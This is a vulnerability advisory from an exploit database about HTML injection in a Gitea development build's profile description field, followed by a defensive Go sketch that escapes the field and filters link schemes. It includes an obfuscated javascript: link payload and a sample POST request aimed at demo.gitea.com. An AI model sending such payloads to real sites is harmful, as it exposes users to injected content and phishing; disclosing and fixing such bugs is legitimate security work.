## https://sploitus.com/exploit?id=PACKETSTORM:189480
Title: Gitea 1.24.0+dev HTML Injection Vulnerability
Description:
Gitea version 1.24.0+dev-355-g74c8e95e87 is affected by an HTML injection
vulnerability. The issue arises from improper input validation in the
description field of the profile settings, which allows an attacker to
inject arbitrary HTML elements. If exploited effectively, this could lead
to security risks such as content manipulation or phishing attacks.
Source URL: https://gitea.com/
Source Name/Email: Arda
CVEs: (No CVE assigned yet)
Software URL: https://demo.gitea.com/
Proof of Concept (PoC):
Vulnerable Endpoint:
URL: https://demo.gitea.com/user/settings
Method: POST
Parameter Affected: description
Vulnerability Type: HTML Injection
Payload Example:
<a href="javas\x00cript:javascript:alert(1)" id="fuzzelement1">test</a>
Request Example:
POST /user/settings HTTP/2
Host: demo.gitea.com

_csrf=xxxx&full_name=&description=%3Ch1%3Etest%3C%2Fh1%3E&website=&location=&visibility=0&keep_email_private=on
This vulnerability allows an attacker to inject arbitrary HTML content,
which may lead to XSS-like behavior depending on how the injected content
is interpreted by the browser.
Best Regards,
Arda
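
A defensive sketch for the description field discussed above, added here as an example; it is not code from the advisory or from Gitea. It assumes the description is meant to be rendered as plain text and that links, where allowed, are limited to an assumed scheme allowlist; the function names are hypothetical.

```go
package main

import (
	"fmt"
	"html"
	"net/url"
	"strings"
	"unicode"
)

// Constructed sample: the form body from the request example above.
const sampleBody = "_csrf=xxxx&full_name=&description=%3Ch1%3Etest%3C%2Fh1%3E&website=&location=&visibility=0&keep_email_private=on"

// Assumed allowlist of link schemes; adjust to local policy.
var allowedSchemes = map[string]bool{"http": true, "https": true, "mailto": true}

// DescriptionFromForm decodes the urlencoded body and returns the description field.
func DescriptionFromForm(body string) (string, error) {
	v, err := url.ParseQuery(body)
	if err != nil {
		return "", err
	}
	return v.Get("description"), nil
}

// RenderDescription treats the description as plain text (an assumption about
// the intended rendering) and escapes it for an HTML text context.
func RenderDescription(desc string) string {
	return html.EscapeString(desc)
}

// SafeHref reports whether a link target may be emitted in an href attribute.
// Control characters are rejected rather than stripped, so an obfuscated
// scheme is never "repaired" into a working one. Relative links are refused.
func SafeHref(raw string) bool {
	if strings.IndexFunc(raw, unicode.IsControl) >= 0 {
		return false
	}
	u, err := url.Parse(strings.TrimSpace(raw))
	if err != nil {
		return false
	}
	return allowedSchemes[u.Scheme] // url.Parse lowercases the scheme
}

func main() {
	d, _ := DescriptionFromForm(sampleBody)
	fmt.Println(RenderDescription(d))
	fmt.Println(SafeHref("javas\x00cript:javascript:alert(1)"), SafeHref("https://gitea.com/"))
}
```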